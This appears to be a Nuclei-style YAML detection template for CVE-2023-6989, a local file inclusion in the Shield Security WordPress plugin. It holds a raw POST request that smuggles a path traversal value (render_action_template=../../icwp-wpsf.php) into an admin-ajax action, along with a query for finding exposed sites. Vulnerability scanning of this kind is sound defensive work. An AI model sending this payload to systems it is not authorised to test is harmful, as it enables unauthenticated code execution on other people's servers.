id: CVE-2023-6989

info:
  name: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion
  author: Kazgangap
  severity: critical
  description: |
    The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
  reference:
    - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6989
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6989
    cwe-id: CWE-22
    epss-score: 0.00282
    epss-percentile: 0.68187
    cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: getshieldsecurity
    product: shield_security
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-simple-firewall"
  tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dashboard_shield"'
          - '"shield_action"'
          - '"search_shield"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950